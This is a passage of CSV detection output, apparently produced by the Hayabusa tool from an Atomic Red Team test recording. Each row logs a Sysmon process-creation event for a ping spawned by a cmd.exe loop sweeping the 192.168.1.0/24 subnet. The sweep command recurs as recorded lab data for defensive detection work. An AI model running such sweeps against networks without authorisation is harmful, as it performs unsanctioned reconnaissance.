User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 884 | PGUID: 747F3D96-D95D-5D31-0000-001001F93600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:17.438 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.206 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5828 | PGUID: 747F3D96-D95D-5D31-0000-0010C8013700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.207 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3436 | PGUID: 747F3D96-D95E-5D31-0000-0010B5043700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.208 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6296 | PGUID: 747F3D96-D95E-5D31-0000-0010A1073700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.209 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4660 | PGUID: 747F3D96-D95F-5D31-0000-0010930A3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.210 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6184 | PGUID: 747F3D96-D95F-5D31-0000-00107F0D3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.211 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3932 | PGUID: 747F3D96-D960-5D31-0000-00106B103700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.212 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 980 | PGUID: 
747F3D96-D960-5D31-0000-001057133700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.213 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4944 | PGUID: 747F3D96-D961-5D31-0000-0010891F3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.214 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2892 | PGUID: 747F3D96-D961-5D31-0000-001075223700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.215 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7164 | PGUID: 747F3D96-D962-5D31-0000-001061253700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:22.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.216 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i 
in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5124 | PGUID: 747F3D96-D962-5D31-0000-0010292E3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.217 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1996 | PGUID: 747F3D96-D963-5D31-0000-001016313700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:23.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.218 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2884 | PGUID: 747F3D96-D963-5D31-0000-001002343700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:23.993 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.219 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3896 | PGUID: 747F3D96-D963-5D31-0000-0010EF363700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.220 | Process: C:\Windows\System32\PING.EXE | 
User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6856 | PGUID: 747F3D96-D964-5D31-0000-0010DB393700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.221 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4932 | PGUID: 747F3D96-D965-5D31-0000-0010C73C3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.222 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1220 | PGUID: 747F3D96-D965-5D31-0000-0010B53F3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.223 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5792 | PGUID: 747F3D96-D965-5D31-0000-0010A1423700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.224 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5656 | PGUID: 747F3D96-D966-5D31-0000-00108D453700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.225 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6632 | PGUID: 747F3D96-D967-5D31-0000-00107C483700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.226 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5844 | PGUID: 747F3D96-D967-5D31-0000-0010BB513700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.227 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6396 | PGUID: 
747F3D96-D968-5D31-0000-001001553700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.228 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1452 | PGUID: 747F3D96-D968-5D31-0000-0010F3573700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:29.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.229 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 112 | PGUID: 747F3D96-D969-5D31-0000-0010DF5A3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.230 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4004 | PGUID: 747F3D96-D969-5D31-0000-0010CB5D3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.231 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i 
in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5468 | PGUID: 747F3D96-D96A-5D31-0000-0010B7603700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:30.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.232 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D96A-5D31-0000-0010A3633700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.233 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D96B-5D31-0000-001090663700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.234 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5016 | PGUID: 747F3D96-D96B-5D31-0000-00107C693700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.235 | Process: C:\Windows\System32\PING.EXE | 
User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-D96C-5D31-0000-00106A6C3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.236 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5488 | PGUID: 747F3D96-D96C-5D31-0000-0010BA763700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.237 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3228 | PGUID: 747F3D96-D96D-5D31-0000-0010A7793700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.238 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2804 | PGUID: 747F3D96-D96D-5D31-0000-0010937C3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.239 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4532 | PGUID: 747F3D96-D96D-5D31-0000-0010827F3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.240 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D96E-5D31-0000-00106E823700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.241 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D96F-5D31-0000-00105A853700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:35.559 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.242 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3556 | PGUID: 
747F3D96-D96F-5D31-0000-0010C78F3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.243 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3788 | PGUID: 747F3D96-D970-5D31-0000-0010B4923700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:36.536 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.244 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7072 | PGUID: 747F3D96-D970-5D31-0000-0010A0953700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:37.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.245 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2700 | PGUID: 747F3D96-D971-5D31-0000-00108C983700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.246 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i 
in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 352 | PGUID: 747F3D96-D971-5D31-0000-0010789B3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.247 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3120 | PGUID: 747F3D96-D972-5D31-0000-00106BA43700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.248 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6976 | PGUID: 747F3D96-D972-5D31-0000-001057A73700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:39.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.249 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2440 | PGUID: 747F3D96-D973-5D31-0000-0010A3AA3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.250 | Process: C:\Windows\System32\PING.EXE | 
